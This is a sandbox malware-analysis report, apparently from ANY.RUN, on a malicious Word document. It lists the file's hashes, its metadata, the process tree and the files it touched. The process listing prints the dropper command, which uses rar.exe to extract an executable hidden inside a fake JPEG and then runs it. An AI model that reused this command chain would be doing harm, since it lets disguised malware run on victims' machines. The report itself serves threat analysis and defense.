File name: | f9c093f408a2c0c66116bb47f466a01fea73b06751962fb89b7c88be123b6a78 |
Full analysis: | https://app.any.run/tasks/3e81394f-ee6c-4f70-8333-3319f1981e53 |
Verdict: | Malicious activity |
Analysis date: | December 06, 2018, 01:51:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 9C65FA48D29E8A0EB1AD80B10B3D9603 |
SHA1: | 1865AE413F6F5C9CFA5182CD011AA28948ED4974 |
SHA256: | F9C093F408A2C0C66116BB47F466A01FEA73B06751962FB89B7C88BE123B6A78 |
SSDEEP: | 1536:zt0AQq4Cb8mJa/bWWogqW6i4homtNiNvHuz5wfmf1ZnYeQWwr:zPKoCrogqji4euNi8zefmf15Y7Wwr |
.docx | | | Word Microsoft Office Open XML Format document (52.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (38.8) |
.zip | | | ZIP compressed archive (8.8) |
AppVersion: | 14 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 5383 |
LinksUpToDate: | No |
Company: | Uito |
TitlesOfParts: | - |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | 10 |
Lines: | 38 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 4589 |
Words: | 804 |
Pages: | 4 |
TotalEditTime: | - |
Template: | Normal.dotm |
ModifyDate: | 2018:11:28 12:29:00Z |
CreateDate: | 2018:11:28 12:29:00Z |
RevisionNumber: | 2 |
LastModifiedBy: | Кирдакова |
Creator: | tvkisdsy |
---|
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 2091 |
ZipCompressedSize: | 471 |
ZipCRC: | 0x288302a9 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3472 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f9c093f408a2c0c66116bb47f466a01fea73b06751962fb89b7c88be123b6a78.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3380 | C:\WINDOWS\system32\cmd.exe /c set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR; && cd /d %~dp0 & rar.exe e -o+ -r -inul *.rar scan042.jpg & rar.exe e -o+ -r -inul scan042.jpg backup.exe & backup.exe | C:\WINDOWS\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2128 | rar.exe e -o+ -r -inul *.rar scan042.jpg | C:\Program Files\WinRAR\Rar.exe | — | cmd.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: Command line RAR Exit code: 10 Version: 5.60.0 | ||||
3860 | rar.exe e -o+ -r -inul scan042.jpg backup.exe | C:\Program Files\WinRAR\Rar.exe | — | cmd.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: Command line RAR Exit code: 10 Version: 5.60.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3472 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA730.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3472 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E93F680F.png | — | |
MD5:— | SHA256:— | |||
3472 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4090E972.wmf | — | |
MD5:— | SHA256:— | |||
3472 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\452542C4.png | — | |
MD5:— | SHA256:— | |||
3472 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E0A27BF5.jpeg | — | |
MD5:— | SHA256:— | |||
3472 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BFDFAD11-0942-431E-BF43-A532FDDD28DA}.tmp | — | |
MD5:— | SHA256:— | |||
3472 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1AD6DEA2-4CA6-469C-BF89-57D3E9A906D0}.tmp | — | |
MD5:— | SHA256:— | |||
3472 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{66F66B78-FD0A-4123-941A-B7705621C587}.tmp | — | |
MD5:— | SHA256:— | |||
3472 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{9A14D323-8699-4273-A7DB-E6C74AEFCA57}.tmp | — | |
MD5:— | SHA256:— | |||
3472 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:4F5F40C47DDD92765B47161B15380CF9 | SHA256:3A34E29F643B0F7C1B38279E3FA88B8310EFE43FDAF57CAE22CE4944767D3F29 |